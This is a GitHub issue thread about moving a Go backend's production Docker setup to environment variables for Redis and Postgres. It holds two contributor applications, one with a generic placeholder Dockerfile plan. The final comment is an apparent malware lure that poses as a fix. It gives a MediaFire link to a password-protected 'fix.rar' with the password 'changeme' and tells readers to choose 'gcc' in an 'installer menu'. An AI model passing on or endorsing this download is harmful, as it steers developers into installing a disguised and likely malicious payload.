### ISSUE TITLE
Fix CI/CD env of Backend pixel

### ISSUE THREAD

**Issue by MSghais** [AFK-AlignedFamKernel/afk_monorepo#74]
Fix backend pixel prod ENV:

- [ ] Change the DockerFile.consumer.prod:
- [ ] Used ENV for Redis and Postgres connection
- [ ] NEed to replace the use of : prod-data.config.json
- [ ] FIx module import in go.mod and others github import
- [ ] Verify if the build and endpoints work well. You can run the UI in the apps/website with run pnpm run dev and go to localhost:3000/pixel

**Comment by ShantelPeters** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/afk---aligned-fam-kernel).

### My background and how it can be leveraged
i am blockchain developer please assign me

### How I plan on tackling this issue
i will approach the problem in the following ways:

### Steps:

1. **Update `Dockerfile.consumer.prod`**:
   - Locate the section in the `Dockerfile` where the app is configured to use `prod-data.config.json`.
   - Replace the configuration reference with environment variables. For example:
     ```dockerfile
     ENV REDIS_URL=your_redis_url
     ENV POSTGRES_URL=your_postgres_url
     ```

2. **Modify the Application Code**:
   - Ensure that the application code is set up to read the Redis and Postgres connection details from environment variables.
   - If the application currently reads from `prod-data.config.json`, refactor it to read from `process.env.REDIS_URL` and `process.env.POSTGRES_URL` (or equivalent in your tech stack).

3. **Test the Configuration**:
   - Build and run the Docker image locally or in a staging environment to ensure that the application correctly connects to Redis and Postgres using the environment variables.
   - Verify that no dependencies on `prod-data.config.json` remain.

### Example Code Snippet:
```dockerfile
# Dockerfile.consumer.prod
FROM your_base_image

# Set environment variables
ENV REDIS_URL=redis://your_redis_instance:6379
ENV POSTGRES_URL=postgres://user:password@hostname:5432/dbname

# Your remaining Dockerfile configuration
...
```

**Comment by MSghais** [comment]
CAn you share an ETA please? Also ping me on Telegram, others issues coming

**Comment by EjembiEmmanuel** [comment]
I am applying to this issue via [OnlyDust platform](https://app.onlydust.com/p/afk---aligned-fam-kernel).

### My background and how it can be leveraged
I'm a backend developer and I'd love to tackle this

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
